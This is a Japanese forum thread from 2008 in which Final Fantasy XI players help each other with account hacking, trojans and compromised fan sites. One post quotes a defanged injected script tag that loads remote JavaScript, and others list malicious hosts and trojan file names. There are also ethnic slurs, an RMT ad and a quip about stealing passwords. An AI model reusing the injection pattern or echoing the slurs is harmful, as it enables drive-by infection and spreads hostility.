ここで注目したいのは、「公式テンプレート以外」というものだ「共有テンプレート」と言って「FC2ユーザーが投稿し他のユーザーと共有できるテンプレート」がある
今年の3月に発生したトラブルは、「共有テンプレート」に関連付けられたファイルの改竄で発生した物だ

ブログ公開者側にしてみれば許諾を出したFC2に一言言いたくなるのも分かるが改竄の問題が無い「公式テンプレート」も存在する
「人気共有テンプレート」提供者のアカウントが何らかの形で悪質な第三者に渡ったり、元々「人気テンプレートの作者が・・・」だった場合には目も当てられないが現実だ
画像ファイル等が置き換えられただけでまた大規模なアカウントハッキング騒動に繋がる恐れが高い、自己責任で扱う物だと少なからず自覚した方が良い。

どこのサービスでも「似たようなテンプレート機能」が増えている昨今「公開者」も「閲覧者」も何処のサイトを見るにしても用心に越したことは無い
グーグル先生に尋ねれば上記トラブルに晒されたサイトの閲覧対処方法は五万と出てくる前述の意味側から無い奴は先生に聞け。
セキュリティソフトの入れて最新の状態を常に保ってインターネットは楽しめよ。

493 名前:既にその名前は使われています:2008/08/24(日) 20:27:33 ID:fNkXKtIU
hostsを覗いてみたら、知らない大量のIPが追加されてて('A`)ウワァー
って一瞬なったけど、spybotで遮断する所を追加してたのを思い出して一安心
寿命が縮まったぜ(;゙゚'ω゚')

チラシの裏でした

494 名前:既にその名前は使われています:2008/08/24(日) 20:30:02 ID:SdIw8Lsz
>>492
罠ブログは今はyaplogが流行ってるみたい。
iframe使える上に通報してもシカト。

495 名前:既にその名前は使われています:2008/08/24(日) 20:32:06 ID:fRm128TT
>>493
よう後輩
俺は2ヶ月くらい前に体験済だぜ

496 名前:既にその名前は使われています:2008/08/24(日) 20:47:15 ID:gtFhdf6B
中華のパス抜いて
売る前にいただこうぜ

497 名前:既にその名前は使われています:2008/08/24(日) 20:58:36 ID:mWVz3tj9
>>494
269gも要注意だっけか

498 名前:既にその名前は使われています:2008/08/24(日) 23:16:44 ID:+HhjpY7l
267あげ

499 名前:既にその名前は使われています:2008/08/25(月) 00:02:02 ID:aAHqegD5
8/8の情報ですまないが
バッファローのルーター使用者はファームウェアアップデートしないと第三者により
ルーター設定いじられるそうだ

ルータ製品におけるクロスサイトリクエストフォージェリの脆弱性対策についてのお知らせ
http://buffalo.jp/support_s/20080808/csrf.html

ルータ関連製品におけるUPnP機能のセキュリティー強化のお知らせ
http://buffalo.jp/support_s/20080808/upnp.html

500 名前:既にその名前は使われています:2008/08/25(月) 00:24:40 ID:gdg1zBK2
おーいつの間にか解析ブログさんが復活してるのね
ブログ主さん頑張ってくれー

501 名前:既にその名前は使われています:2008/08/25(月) 00:30:57 ID://hAtgGQ
日本の商流だと

盗品→支那畜→在日支那or日本人バイヤー
 → 販社 → 消費者(RMTPlayer)

このビジネスモデルをどげんとせんといかん!






502 名前:既にその名前は使われています:2008/08/25(月) 00:35:04 ID:bZZspZfv
おやすみ前の上げ

503 名前:既にその名前は使われています:2008/08/25(月) 00:42:42 ID:gguyq+DG
自分のPCの同じポートが送信元になっているのを延々とブロックしてるんだが、
これなんだろう・・・。
こちらの送信元のポート番号は30804。送信先は色々。気持ち悪いよー。

504 名前:既にその名前は使われています:2008/08/25(月) 00:45:09 ID:/UuNPMIh
>>503
ヅロック解除してみようよ^^

505 名前:既にその名前は使われています:2008/08/25(月) 00:45:59 ID:Fhw2Qtgd
あんまネットワークには詳しくないけど、>>499のはけっこー重要なんだよね?
今のところ、SandBoxieとその設定方法>>218、ルーターの脆弱性がテンプレにないから
差し支えなければテンプレに入れてもらいたいな。

506 名前:既にその名前は使われています:2008/08/25(月) 00:46:00 ID:gdg1zBK2
>>503
スカイプ使ってる?

507 名前:既にその名前は使われています:2008/08/25(月) 00:49:02 ID:kELoTicd
>>499
ウチの日本電気さんは大丈夫なのだろうか・・・?

508 名前:既にその名前は使われています:2008/08/25(月) 00:49:47 ID:gguyq+DG
>>506
今は起動してないけど、最近使い始めた。なんかあるのかな?

>>504
さっき一瞬PG2終了しちゃったよ。どうしよう。

509 名前:既にその名前は使われています:2008/08/25(月) 00:52:53 ID:gdg1zBK2
>>508
1.スカイプはP2Pを使ったサービス
2.PG2はP2Pをブロックするために作られたソフト

510 名前:既にその名前は使われています:2008/08/25(月) 01:11:20 ID:gguyq+DG
>>509
なるほど。スカイプする時は気をつけとくよ。ありがとう。

今回はどうやら、bittorent DNAをONにしっぱなしが原因だったみたいだ。
パンヤのDLにインストールしてそのままだったらしい。
bittorentがP2Pなのをコロッと忘れてた。お騒がせしてすまない。

511 名前:既にその名前は使われています:2008/08/25(月) 01:24:33 ID:4NgDQuAW
>>499
感謝です
これからアップデートしておきます

512 名前:既にその名前は使われています:2008/08/25(月) 01:30:53 ID:JTiR8YU2
427だけど、まだ完了メールこねー
遂に7週目突入
さすがにこれはアホだろ・・・

513 名前:既にその名前は使われています:2008/08/25(月) 01:42:45 ID:9A2kxl7O
夕方くらいに「FFXI吟遊詩人テンプレート」踏んだら
うちのAntiVirさんが反応したんだけど報告あがってないわね

それとも月初めの改ざん被害から修正されてない?

514 名前:既にその名前は使われています:2008/08/25(月) 01:43:02 ID:rQ5OiOQQ
メールが届かないが、はいれたって報告あった気がしたが・・・・
一度ためしてみては?

515 名前:既にその名前は使われています:2008/08/25(月) 01:54:33 ID:eQfds94H
>>513
アドレス貼ってくれなきゃチェックしようがない

516 名前:既にその名前は使われています:2008/08/25(月) 01:56:46 ID:l6bGpgNe
ああカスペル好きー入れてるのにハックくらったorz

517 名前:既にその名前は使われています:2008/08/25(月) 01:59:06 ID:5lAvODeL
入れてるだけじゃくらうのもムリない

518 名前:既にその名前は使われています:2008/08/25(月) 01:59:23 ID:s+0zoUMl
>516
テンプレうめといてくれ

519 名前:既にその名前は使われています:2008/08/25(月) 02:00:42 ID:lkBumYd4
FFXI Web Potalさん追記きてた

520 名前:既にその名前は使われています:2008/08/25(月) 02:00:59 ID:Y1tnyet8
事後報告になるけど

7/14 ハック
7/16 投函

8/20 不正アクセス専用チャットでクレーム
8/24 16時過ぎ、凍結中のアカからGMコールにて再クレーム
    17時頃、メールが届いて復旧完了

GMコールできつく言わないと多分終わらないと思う

もうそんなにお時間は取らせないと思います → 1ヶ月待ったので詳しく答えてほしい
そうですね、今日中には終わると思います → わかった、よろしく

で、それから1時間もしないでメールきてるから、GMが作業やってんじゃねーかって
思うぐらいの連携だった…
ちなみに復旧データは最終ログアウトそのままのデータでした

521 名前:既にその名前は使われています:2008/08/25(月) 02:10:51 ID:l6bGpgNe
>>518
何を書いても>>517みたいに叩かれそうで怖いから書かないでおきます^^;

522 名前:既にその名前は使われています:2008/08/25(月) 02:13:26 ID:S/telzqe
またハックされて泣いてからまた来なさい

523 名前:既にその名前は使われています:2008/08/25(月) 02:13:39 ID:5lAvODeL
>>521
帰れ帰れ

524 名前:既にその名前は使われています:2008/08/25(月) 02:16:55 ID:D6o2RlpQ
ハックされてもまだFF続けるってのが凄いと思った。

525 名前:既にその名前は使われています:2008/08/25(月) 02:20:42 ID:hJEK5AIQ
>>523
てめーもいちいち煽るなようぜぇな

526 名前:既にその名前は使われています:2008/08/25(月) 02:22:36 ID:S/telzqe
はいはいやめてやめて

もういないかもしれないけど>>1あたりのテンプレ読めば自己解決出来るかもしれないから
報告しないならがんばって。

527 名前:既にその名前は使われています:2008/08/25(月) 02:28:19 ID:GjcLbOrD
PG2は、送信先と送信元が入れ替わることがよくあります
なんでなのかと聞かれてもわかりませんが・・・w

まぁベータだしー

528 名前:既にその名前は使われています:2008/08/25(月) 02:33:58 ID:GjcLbOrD
ウィルス対策ソフトさえ入れてれば大丈夫だと思っている人が多いのは
ソフトそのものの売りがそうなってることもあって仕方がないことですが
そもそもウィルス対策ソフトは感染してから活躍するものであって
感染予防のためのものではないことを認識してください

529 名前:既にその名前は使われています:2008/08/25(月) 02:49:29 ID:4Tw2AKw1
Windows Updateしたら
Windows XP Service Pack 3にしろみたいに出たんだが
やった方がいいのかな?

530 名前:既にその名前は使われています:2008/08/25(月) 03:03:49 ID:xyZE++6H
>>528
アンチウイルスは感染してから使うものではないわけだが・・・




531 名前:既にその名前は使われています:2008/08/25(月) 03:13:14 ID:GjcLbOrD
>>530
その役目を果たしているアンチウィルスソフトがあったら紹介してください

532 名前:既にその名前は使われています:2008/08/25(月) 03:15:27 ID:S/telzqe
言われてみれば矛盾してるなwww

533 名前:既にその名前は使われています:2008/08/25(月) 03:15:33 ID:D6o2RlpQ
>>530-531
もう寝れば?

534 名前:既にその名前は使われています:2008/08/25(月) 05:30:50 ID:pEeAsc98
>>513
FFXI吟遊詩人テンプレ bdbk●s41.xrea.comね
また1039045744が仕込まれてるわ
根本解決出来るまでxreaはダメっぽいか?

535 名前:既にその名前は使われています:2008/08/25(月) 05:52:57 ID:8ELWrpLm
復元完了メールがまだ届いてないのですが
先ほどFFXIを起動させたらIDの凍結が解除されていました。
昨日までは凍結されていたのですが、もしかしたら復元完了でしょうか?
8月の料金はまだ払っていません。

536 名前:既にその名前は使われています:2008/08/25(月) 07:42:22 ID:pLqAcjio
フレが最近復旧したんで何日かかったのか聞いてみたら
ほぼ一月半だって言ってたよ。

537 名前:既にその名前は使われています:2008/08/25(月) 08:06:49 ID:9A2kxl7O
>>515
>>534が調べてくれたようです、ググってトップ表示だから手を抜いてしまったすまん

踏む前にaguse.jpでチェックしてみたんだけど異常なしだったんだよね
悪意をもって作られたサイトしか検知しないのかしらこれ

538 名前:既にその名前は使われています:2008/08/25(月) 08:10:00 ID:kELoTicd
ageましょう

539 名前:既にその名前は使われています:2008/08/25(月) 09:07:28 ID:pEeAsc98
>>537
何か物凄い勘違いをしてないか?
>>1のFF11WARNINGに書いてあるから至急の対処を勧める

540 名前:既にその名前は使われています:2008/08/25(月) 09:33:49 ID:2MWueQ6R
>>529
SP1からSP2の時のような大きな変化は無いとは言え、しないでおくよりかはしておいた方がいい

541 名前:既にその名前は使われています:2008/08/25(月) 09:48:54 ID:XnGM/+Ac
垢ハックされたらクレカのカード番号も見られちゃう?

542 名前:既にその名前は使われています:2008/08/25(月) 09:54:15 ID:chWZoT5z
下4桁だけな

543 名前:既にその名前は使われています:2008/08/25(月) 10:10:41 ID:CeD88hs2
>>539
aguse.jpを勘違いしている予感ですが
感染はしてないです大丈夫心配してくれてありがとう

544 名前:既にその名前は使われています:2008/08/25(月) 12:29:15 ID:BAY6m8kC
保守
Flashplayer    Ver9.0.124.0にしよう!
Realplayer    削除しよう!
WindowsUpdate   常に最新にしよう!

249まで下がってる!

545 名前:既にその名前は使われています:2008/08/25(月) 12:33:14 ID:CeD88hs2
Noscriptいれたんだけど
設定変更するとこあるかな?

546 名前:既にその名前は使われています:2008/08/25(月) 12:50:27 ID:Vih376DR
オプション→プラグイン→<IFRAME>の禁止にチェックを入れる

547 名前:既にその名前は使われています:2008/08/25(月) 13:23:48 ID:mh9tveG0
>>499の件を調べようとハードウェア板のバッファローのルータースレ行ったら、
「安定しないのは部屋の空気のせいとサポセンに言われた」とか「サポセンの女が
いきなりアハッアハハとか笑い出した」とかバッファロー色々ヤバいなw

・・・NECの買ってきます(´・ω・`)

548 名前:既にその名前は使われています:2008/08/25(月) 13:28:35 ID:CeD88hs2
>>546
thx

549 名前:既にその名前は使われています:2008/08/25(月) 13:33:50 ID:2MWueQ6R
>>547
無線ルータのほうを見たんだな。
まぁn対応機の良品がWZR-AGL300NHしかないからな〜

NECもNECでWR8500N以外はネトゲに向かないっていう地雷もちだし・・・

550 名前:既にその名前は使われています:2008/08/25(月) 14:14:08 ID:x9zN+DA0
垢ハックされるド素人が集うスレだから仕方ないとはいえ、無線LANでネトゲするなよ…

551 名前:既にその名前は使われています:2008/08/25(月) 14:30:00 ID:Zu9F0686
そんな古臭い考え言われてもな。

552 名前:既にその名前は使われています:2008/08/25(月) 14:31:30 ID:x9zN+DA0
古臭い?お前が上級者か馬鹿なだけだろ

553 名前:既にその名前は使われています:2008/08/25(月) 14:34:42 ID:mh9tveG0
>>549
調べて見たら、仰る通りネトゲやるにはNECの方も問題が多いようですね〜

>>550
自分の場合はFFをプレイするPCは有線で繋いで、ネット閲覧等をするノートPCは
無線LANで繋いでるんですよ。そういう環境の人も多いと思いますよ。

554 名前:既にその名前は使われています:2008/08/25(月) 14:35:49 ID:GW0viPiD
x9zN+DA0みたいな煽り屋相手にするなよ・・・

555 名前:既にその名前は使われています:2008/08/25(月) 14:36:57 ID:Zu9F0686
素人に無線LANでネットに接続するなならわかるが、ネトゲするなには大した根拠ないだろ。

556 名前:朝鮮KAREI ◆Borr/IL/SA :2008/08/25(月) 14:37:40 ID:0gPn7jAf
垢ハックされたやつざまーw

557 名前:既にその名前は使われています:2008/08/25(月) 14:47:00 ID:7GTEEAv1
無線LANでネトゲするなってのはセキュリティより遅延や接続障害の話だろ
いくら最新技術の高級機種を使ったって利用場所の電波状況が悪いのはどうにもならん
>>547の「部屋の空気のせい」ってのはあながち冗談でもないぞ

558 名前:既にその名前は使われています:2008/08/25(月) 15:02:34 ID:G0OhcMlM
変なコテが沸いたな

559 名前:既にその名前は使われています:2008/08/25(月) 15:15:28 ID:GtIxmrzn
板で一ニを争う既知外コテだから相手にしないでくれ

560 名前:既にその名前は使われています:2008/08/25(月) 15:36:36 ID:Df/KphWr
華麗に保守

561 名前:既にその名前は使われています:2008/08/25(月) 15:40:30 ID:nG4bKktk
全サーバー対応 ギル買取させていただきます #c474435 #e3104802, at 2008 08/25 15:22
name あられ UIDZGUECaRc
contact Tel○ エスクロー○
■買取レート 100万ギル=3400RM
■募集数 1億ギル

■注意事項
・取引実績の少ない方はギル先渡しかエスクローのいずれかでお取引をお願いいたします
(エスクロー手数料は売り手負担となります)・中国系業者及びTV出演歴のある一部業者との
取引経験がある方からの買取はできません

買取希望の方はPM、もしくはmana_pure@saku2.comまでメールにてご連絡くださいませ
当サイトにて多数の取引実績がありますので安心できるお取引をさせていただきます

自家生産?うそつけよ業者www
http://page4.auctions.yahoo.co.jp/jp/auction/d83238484

>>当店は他生産者からの買取を一切行わず
詐欺だな BAN注意

562 名前:既にその名前は使われています:2008/08/25(月) 16:16:11 ID:hFpp3nG5
24時間コッファー荒らししてるヤツの競売履歴みたら、案の定シーフツールとインスニ忍具しか取引がねぇ・・・


滅べカス業者

563 名前:既にその名前は使われています:2008/08/25(月) 17:42:41 ID:CrkSeuR8
229 サルベージ

564 名前:既にその名前は使われています:2008/08/25(月) 17:47:57 ID:SGI8RRaZ
>>540
しかし、SP3にすると突然PCが再起動するという不具合があるんだな。

565 名前:既にその名前は使われています:2008/08/25(月) 17:52:37 ID:3LpaZ5Bf
お前だけだろw

566 名前:既にその名前は使われています:2008/08/25(月) 17:56:03 ID:Prcrh5qH
>>564
そんなのなった事ないぞw

567 名前:既にその名前は使われています:2008/08/25(月) 18:01:56 ID:UYTgJGA8
>>566
HP製の一部PCが、AMD機にもなぜかIntelドライバ入ってて、それがSP3適用時に悪さをする

568 名前:既にその名前は使われています:2008/08/25(月) 18:09:27 ID:G0OhcMlM
homeSP2からproSP3に変えたけど
なんか不安定になったよ
いつもはぜんぜん平気な温度で
いきなりブルースクリーンで再起動

569 名前:既にその名前は使われています:2008/08/25(月) 18:20:43 ID:ntFl1ReY
キャラを出して20分で強制ログアウト。
時間無制限にしてたのでおかしいと思い、手動ウィルスチェック。trojan感染してました。削除します。。
それからウィルス情報が更新するたびに手動してます。

570 名前:既にその名前は使われています:2008/08/25(月) 18:26:17 ID:gdg1zBK2
>>569
っていうかアカウントは無事なの?

571 名前:既にその名前は使われています:2008/08/25(月) 18:35:03 ID:ntFl1ReY
〉〉570
低スペックのffのみpcもあるのでそれでパスかえました。
1週間たってるけど今のところ無事

572 名前:既にその名前は使われています:2008/08/25(月) 18:36:59 ID:gdg1zBK2
>>571
なるほど、そりゃ良かった
駆除に自信がないなら感染PCの方はクリーニンスコしちゃいなよ

573 名前:既にその名前は使われています:2008/08/25(月) 18:53:00 ID:9iuu7x5k
>>571
ウィルスの名前がわからないからFlashで感染したのかIFRAMEで感染したのか
わかりませんけど、WindowsとFlashplayerの更新確認をお忘れなく

574 名前:既にその名前は使われています:2008/08/25(月) 18:56:33 ID:EQyXsmBb
前に紹介されてたVirtualboxとUbuntu、使ってみたけどなかなかいいな。
Linuxとしてはちょいと変り種っぽいけど、Windowsしか使ったことがないユーザだと
Ubuntuが一番使いやすいかも。

575 名前:既にその名前は使われています:2008/08/25(月) 19:10:54 ID:1U87Mnf+
>>564
1)スタートメニュー→設定→コントロールパネルを開いて、「システム」の画面を開く
2)「詳細設定」タブの、「起動と回復」から、「設定」画面を開く
3)「システムエラー」の、「自動的に再起動する」のチェックを外す。

これじゃダメ?

576 名前:既にその名前は使われています:2008/08/25(月) 20:00:12 ID:iAToL/li
>>575
それはブルーバックなどのトラブル時に自動的に再起動させない設定なので
トラブル自体の回避は出来ないので意味ないのでは?

577 名前:既にその名前は使われています:2008/08/25(月) 20:07:20 ID:AjlSNZY2
公式の著作物利用のガイドライン関連の規約をうまいこといじくって
RMTの広告(規約違反幇助w)を出してるサイトに画像の使用などを認めないようにできそうなもんだが。

今気づいたが、詩人テンプレにもRMT広告あるじゃんorz・・・


578 名前:既にその名前は使われています:2008/08/25(月) 20:15:49 ID:1U87Mnf+
>>576
そっか〜
どこかで解決方法見た覚えがあるんだけど思い出せないや(;´д⊂)

579 名前:既にその名前は使われています:2008/08/25(月) 20:38:41 ID:pEeAsc98
>>577
確かに。対策してると気付かないもんだな
逆にRMT広告に気付いてた人は感染注意か

580 名前:既にその名前は使われています:2008/08/25(月) 21:47:33 ID:JDPOHsD9
辛苦
あげ

581 名前:既にその名前は使われています:2008/08/25(月) 22:56:50 ID:FJpsTBYM
ほしゅほしゅ

582 名前:既にその名前は使われています:2008/08/25(月) 23:00:38 ID:G0OhcMlM
不正アクセスの調査結果早く汁

583 名前:既にその名前は使われています:2008/08/25(月) 23:50:27 ID:weZWo/5J
たった今ハックされたんだがどうしよう・・
PCとPS2の2アカ両方ログイン出来なくなってやがる
せっかく昨日シャイル買ったのに・・どうすればいいよ?;
マジテンパってるんだけどうしよう 頼む教えてくれ 公式読んでも訳わからん;

584 名前:既にその名前は使われています:2008/08/25(月) 23:51:25 ID:cm5nTrqj
まずウィルス見つけて駆除しちゃいなよ

585 名前:既にその名前は使われています:2008/08/25(月) 23:53:55 ID:snrEUrhy
FFXI(仮)復活してる

586 名前:既にその名前は使われています:2008/08/25(月) 23:59:21 ID:iAToL/li
>>583
PS2側のアカをPCで使ったことある?
もしくはLSコミュニティーとか
そうでなければ現状PS2でアカハックはほぼ無いはずなんだけど(絶対ではない)


587 名前:既にその名前は使われています:2008/08/26(火) 00:04:13 ID:GKLL9BYt
もうした、これなら大丈夫と思いこめる程やった
なのにパスが二つとも変わっててダメだった・・
マジで泣きたいわ・・飽きてたとはいえ愛着のあるキャラだけに
他人に動かされてる、しかも業者だと思うとなおさらだ
で、ちとフレにも相談してるんだけど 
巻き戻しサービス?っぽいのはどうやればいいの? □に連絡いれるのは当たり前として、どこまで戻るのか教えてほしい・・
いきなり長文すまない、真面目に困るから俺に色々手ほどきしてください・・お願い;

588 名前:既にその名前は使われています:2008/08/26(火) 00:05:33 ID:9iFofIww
電気通信事業法違反:ネットで違法中継 容疑の男書類送検−−山口・下松署

インターネットでオンラインゲームを違法に中継したとして、
山口県警下松署は21日、東京都江戸川区でパソコン修理などを営む
中国人の男(30)を電気通信事業法違反(無届け事業)の疑いで
山口地検周南支部に書類送検した。

調べでは、男は昨年8月から今年6月まで、都内の自宅にネット接続を
代行するプロキシサーバ150台を設置し、中国などの利用者にゲーム
を中継した疑い。アクセス数は1102万回に及び、利用者から約172万円
の報酬を受け取っていたらしい。

下松市内の会社員から「ゲームのIDを盗まれて仮想通貨をとられた」
と不正アクセスの相談があり、接続元の男を特定した。

同様の摘発は今年に入って全国で2件目。オンラインゲームを運営する
国内の業者は、不正アクセスの多い中国からの接続を遮断している。

ソース:毎日新聞 2008年8月22日 西部朝刊
http://mainichi.jp/seibu/shakai/news/20080822ddp012040017000c.html

589 名前:既にその名前は使われています:2008/08/26(火) 00:06:16 ID:xhthivcl
テンプレ書かないやつの質問に答えるヤツはいないと思うぞ

590 名前:既にその名前は使われています:2008/08/26(火) 00:08:14 ID:y2xPudYu
>>588
まああれだ
トカゲの尻尾切りよろしく
中継した奴が捕まるだけで
本国のやつは安全なんだろうな

591 名前:既にその名前は使われています:2008/08/26(火) 00:09:00 ID:xFtoKThM
>>588
そのアクセスの内、半分以上がFF11だとしても恐らく
発見に至る警察への届け出だしたのはスクエニじゃない気がする。

592 名前:既にその名前は使われています:2008/08/26(火) 00:09:44 ID:9iFofIww
これFF11?

593 名前:既にその名前は使われています:2008/08/26(火) 00:09:50 ID:IkbAkKZv
>>583
>>587
┐(゜〜゜)┌

594 名前:既にその名前は使われています:2008/08/26(火) 00:20:01 ID:y2xPudYu
次の馬鹿な中継君見つけるだけだな

595 名前:既にその名前は使われています:2008/08/26(火) 00:25:41 ID:sKK738xK
>>587
まず>>2

596 名前:既にその名前は使われています:2008/08/26(火) 00:27:43 ID:GKLL9BYt
テンプレ一通りみたけど
なんだろう・・
書ききれないのとよくわからないのがあるけど書きますね、上から箇条書きでやるから長いです。
気づいた日 本日22:20
アドレスはここ最近みたのは詩人のwikiとエレメン、4亀くらい
PC今OSから入れ直ししてるからURLは出せない、すまない ケータイからだとキツイ;
他人のは使ってはない、2アカがカウントされるかは知らないけど・・
ID パスについてはオートログイン、本アカがPC 2アカがPS2でオート ただしバスは三月に二つとも変更した
他人が使うことはまずない。嫁さんには専用のがあるから。
ツールは使ったことはないです 
ネカフェではしたことはない、利用はしたことはあるけど
OSはXPのホームエディション
ブラウザは最新の奴、つい最近アップした
続きは次で

597 名前:既にその名前は使われています:2008/08/26(火) 00:35:01 ID:31FlF9ki
とりあえず、今の時間サポートつながらないだろうし
嫁さんのアカでログインし(絶対に自分のPC使わない、PS2がベスト)
GMコールで一時的にアカロックしてもらえばいいんじゃない?


598 名前:既にその名前は使われています:2008/08/26(火) 00:35:32 ID:GKLL9BYt
続き
フラッシュ・リアル両方とも最新のバージョンにしてある
この先がちょっと俺にはわからないです・・まだあるので残りもやります
テンプレは最初はテンパったから見てなかったけど今は取りあえず一通り読んだ
またもう少し見てみるけども・・
hostsの変更はしたことはないはず・・
後はサッパリなんです・・ごめんなさい
来月のVU楽しみにしてた矢先にこんな事態になってテンパってますの・・;


599 名前:既にその名前は使われています:2008/08/26(火) 00:37:02 ID:VqNqiG7z
534 名前: 既にその名前は使われています 投稿日: 2008/08/25(月) 05:30:50 ID:pEeAsc98
>>513
FFXI吟遊詩人テンプレ bdbk●s41.xrea.comね
また1039045744が仕込まれてるわ
根本解決出来るまでxreaはダメっぽいか?

これか?

600 名前:既にその名前は使われています:2008/08/26(火) 00:37:23 ID:31FlF9ki
あと、ここで最新バージョンが入ってるって書くと怖い人に怒られる
正確にバージョン番号書こうね
ちなみに詩人があやしいかもね


601 名前:既にその名前は使われています:2008/08/26(火) 00:37:55 ID:xhthivcl
>フラッシュ・リアル両方とも最新のバージョンにしてある

これに何度だまされたことか・・・w

602 名前:既にその名前は使われています:2008/08/26(火) 00:39:51 ID:8Lblg6Js
おやすみ前のあげ。

★FlashPlayerのバージョン確認 = ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm

FireFoxとIEのFlashPlayerは別のものだから、両方でバージョンを確認すること。

603 名前:既にその名前は使われています:2008/08/26(火) 00:46:59 ID:GKLL9BYt
そうなのか・・調べるにも再インストールやりはじめちゃったからなー;
詳しくかけなくて申し訳ないです・・
詩人のwikiがやっぱアウトだったのかな・・前にそういうのがあったとは聞いたけど
大丈夫と思いこんで見てたよ・・、とにかく明日にでも電話いれてアカウントの凍結要請をしてもらわないとかな・・
本当にすみません、こんな事態にあったことのある人が周りにいなく、頼れるとこがここしかなくて
慌ててしまってすいません・・もう少しテンプレ読み回してきます;


604 名前:既にその名前は使われています:2008/08/26(火) 00:51:04 ID:31FlF9ki
再インストール&セキュリティーソフト類入れるまで
LANケーブル抜いておくようにね


605 名前:既にその名前は使われています:2008/08/26(火) 00:51:05 ID:my+q0ss5
気持ちはわかるがちょっとお茶でも飲んで気を落ち着けろ
焦ってる状態だと理解できるものも出来なくなっちまうぞ?

606 名前:既にその名前は使われています:2008/08/26(火) 00:56:10 ID:F9UYRbZ/
>これなら大丈夫と思いこめる程やった
なのに 具体的なバージョンはわからないのかw

607 名前:既にその名前は使われています:2008/08/26(火) 00:58:11 ID:ktOeh3QM
>>573
C:¥WINDOWS¥SYSTEM32 Karnaegh1Drv.dll Trojan-GameThief.Win32.OnLineGames.biuv
C:¥WINDOWS¥SYSTEM32 Karnaegh2Drv.dll Trojan-GameThief.Win32.OnLineGames.biuv
C:¥WINDOWS¥SYSTEM32 sonb32drv.dll Trojan-PSW.Win32.Nilage.djl 
が駆除されてました。

608 名前:既にその名前は使われています:2008/08/26(火) 01:03:06 ID:W6Z3PLdB
それだと、フラッシュ経由かねぇ

609 名前:既にその名前は使われています:2008/08/26(火) 01:07:38 ID:9MYPPuXJ
>>596
パス変更はどっちでしたんだろう?
で、ちょっとスレ違いなんだけど、ニコ動とか見るのにCravingExplorer使ってるけどやはり危険ですかねぇ。
IEで見てるのと一緒だよね?

610 名前:既にその名前は使われています:2008/08/26(火) 01:20:48 ID:peRKZQD+
>>583
昨日シャイル買ったんなら巻き戻されても間違いなく消えてるよ
てかハック対策してないなんてあきれるわ。自業自得

611 名前:既にその名前は使われています:2008/08/26(火) 01:41:42 ID:KLFWa57V
慌ててたとは言え証拠を消しちゃったのは痛いな
3月からパス変えてないなら前の騒動の時に抜かれて
やっと>>583の番が来たって感じだが

612 名前:既にその名前は使われています:2008/08/26(火) 01:52:50 ID:sKK738xK
>>600
きちんとバージョン番号を書かずに「最新バージョン」とか書く香具師が
本当に最新だったことが無いから仕方ない。

613 名前:既にその名前は使われています:2008/08/26(火) 02:01:56 ID:31DuSpaQ
最新バージョンでした(キリッ に何度だまされたことか

614 名前:既にその名前は使われています:2008/08/26(火) 02:32:23 ID:FEp+kRbo
垢ハックされた人、とりあえずPCのクリーンインストールとリカバリーが
終わったらゆっくり書くといいですよ

お茶でも飲んで、落ち着いて

アカウントの取り戻し(巻き戻し)は、ちゃんとユーザー登録をしていれば
できるから慌てなくても大丈夫です

615 名前:既にその名前は使われています:2008/08/26(火) 02:38:46 ID:cKySpaSV
夕方FFの公式見てたらぽんぽん検出されて焦った

616 名前:既にその名前は使われています:2008/08/26(火) 02:42:39 ID:vsLA5Lu1
お腹が検出されたのか

617 名前:既にその名前は使われています:2008/08/26(火) 03:02:11 ID:u5aFcyCD
正露丸オススメ

618 名前:既にその名前は使われています:2008/08/26(火) 04:58:59 ID:FEp+kRbo
ほしゅ

619 名前:既にその名前は使われています:2008/08/26(火) 06:11:56 ID:7wv0SHN8
クリーンインストール(リカバリー)かければ
取りあえず 安心・・・かな。(また入らないようにね


620 名前:既にその名前は使われています:2008/08/26(火) 06:13:18 ID:FY3FSb09
>>614

名前むちゃくちゃで住所とか適当な適当情報だったけど巻きもどししてもらえたよ。
その代わり名前と生年月日とかは書き換えられたっていってた。

嘘じゃなくてほんとです。

621 名前:既にその名前は使われています:2008/08/26(火) 06:14:39 ID:7wv0SHN8
抜けれてハックまで時間かかる。っての定番ぽいので
こまめにパスかえてりゃ その場しのぎにはなるかな。
保障はないけど。

622 名前:既にその名前は使われています:2008/08/26(火) 06:18:25 ID:W6Z3PLdB
引っかかるやつが少なくなったらすぐやられるんじゃないかねぇ

623 名前:既にその名前は使われています:2008/08/26(火) 06:40:24 ID:7wv0SHN8
>>603
GMコールで垢とめても、移転で復活されるっぽい
or何らかの方法で復活する。


624 名前:既にその名前は使われています:2008/08/26(火) 06:44:49 ID:amnDWXmV
「FFXI マップガイド」でググって表示されるキャッシュのリンクも
踏んだら061238148112●ctinets●comとかいうところに
接続しようとするようだ

とりあえず遮断ルールに追加した

ネットワークセグメント 61●238●0●0 - 61●239●255●255
ネットワーク名 CTIHK
ドメイン名 CTINETS●COM
技術連絡先
Hong Kong Broadband Network
16/F Trans Asia Ctr
18 Kin Hong St Hong, Kwai Chung
HK
852 2199 8833 fax: 852 2199 8877



625 名前:既にその名前は使われています:2008/08/26(火) 07:05:08 ID:N5XWxrRN
既にパス抜かれてて業者の処理待ちって奴も多いんだろうなぁ
こまめにpass変えないとね

626 名前:既にその名前は使われています:2008/08/26(火) 07:05:28 ID:amnDWXmV
ソースに</TR><script src=ht2p://1039045744:88○jp●js></script>が記載されてるね

627 名前:既にその名前は使われています:2008/08/26(火) 07:10:25 ID:eIf/wMGV
Your Player Version:WIN 9,0,124,0
これでおk?

628 名前:既にその名前は使われています:2008/08/26(火) 07:12:09 ID:W6Z3PLdB
うん

629 名前:既にその名前は使われています:2008/08/26(火) 08:49:32 ID:qJWApAxo
数週間前のスレに田代砲でウィルスの送信先に
でたらなめな文字の羅列を送ってる勇者いなかったっけ?

今はパス抜かれてキャラがハックされるまでどのくらいラグがあるのやら

630 名前:既にその名前は使われています:2008/08/26(火) 09:12:41 ID:vd6wHlB9
俺なんかちゃんとXPにSP3当てて最新にしてるから
Your Player Version: WIN 6,0,79,0 と出たぜ

とか書いても真に受ける初心者居そうで怖いな
上記はダメダメな例ですので念のため

631 名前:既にその名前は使われています:2008/08/26(火) 10:16:52 ID:03AFgunk
atsuh●s57●xrea●com/ (FFXIチアフル another Suite)
のサイトにも
1039045744:88/jp●jsが仕込まれているようです。
FFログ解析ツールとかアップしているところだと思います。
既出だったらすみません。

632 名前:既にその名前は使われています:2008/08/26(火) 10:33:53 ID:7n1RFDk7
まぁ自動ログインにしっぱなのが悪いと思うな

